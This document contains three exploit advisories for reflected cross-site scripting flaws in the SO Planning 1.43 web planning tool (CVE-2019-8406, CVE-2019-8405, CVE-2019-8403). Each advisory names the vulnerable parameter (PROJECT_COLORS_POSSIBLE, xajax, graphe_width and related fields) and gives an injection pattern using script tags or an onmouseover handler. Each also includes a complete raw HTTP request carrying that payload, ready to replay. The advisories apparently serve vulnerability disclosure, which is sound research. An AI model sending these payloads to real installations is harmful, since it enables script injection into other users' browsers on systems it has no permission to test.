===========================================================================================
# Exploit Title: SO Planning 1.43 - 'PROJECT_COLORS_POSSIBLE' XSS Injection
# CVE: CVE-2019-8406
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:SO Planning is a Simple Online Planning tool.
Allows you to plan working periods for each person of your team,
in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : PROJECT_COLORS_POSSIBLE
# Attack Pattern : e'"()&%<acx><ScRiPt >alert(9871)</ScRiPt>
# POST Request : http://localhost/soplanning/www/process/options.php
===========================================================================================
GET /soplanning/www/options.php HTTP/1.1
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Host: localhost
###########################################################################################
===========================================================================================
# Exploit Title: SO Planning 1.43 - 'xajax' XSS Injection
# CVE: CVE-2019-8405
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:SO Planning is a Simple Online Planning tool.
Allows you to plan working periods for each person of your team,
in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : xajax
# Attack Pattern : submitFormProjet'"()&%<acx><ScRiPt >lWct(9209)</ScRiPt>
# POST Request : http://localhost/soplanning/www/process/xajax_server.php
===========================================================================================
POST /soplanning/www/process/xajax_server.php HTTP/1.1
Content-Length: 334
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
xajax=submitFormProjet'"()%26%25<acx><ScRiPt%20>lWct(9209)</ScRiPt>&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=&xajaxr=1550350032415
###########################################################################################
===========================================================================================
# Exploit Title: SO Planning 1.43 - 'graphe_width' XSS Injection
# CVE: CVE-2019-8403
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:SO Planning is a Simple Online Planning tool.
Allows you to plan working periods for each person of your team,
in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : graphe_width,graphe_height,ordonnee_max,ordonnee_min
# Attack Pattern : 500"onmouseover=jfQ2(9564)"
# POST Request : http://localhost/soplanning/www/stats_users.php
===========================================================================================
POST /soplanning/www/stats_users.php HTTP/1.1
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
abscisse_echelle=jour&abscisse_echelle_valeur=heures&date_debut=16/02/2019&date_fin=16/03/2019&graphe_height=500"onmouseover=jfQ2(9564)"&graphe_width=1100&grille=grille_h&ordonnee_max=1&ordonnee_min=1&projets=1&projet_id=test&users=1&user_id=ADM
